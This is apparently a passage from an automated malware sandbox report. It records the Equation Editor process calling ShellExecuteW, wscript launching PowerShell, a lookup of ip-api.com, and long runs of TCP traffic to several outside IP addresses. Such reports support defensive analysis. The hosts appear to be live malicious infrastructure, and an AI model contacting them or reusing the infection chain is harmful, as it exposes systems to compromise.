                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03620639 ExitProcess,2_2_03620639
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03620614 ShellExecuteW,ExitProcess,2_2_03620614
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036205FF ShellExecuteW,ExitProcess,2_2_036205FF
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 192.3.216.148:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 192.3.216.148:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.3.216.148:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
                  Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
                  Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.148:80
                  Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
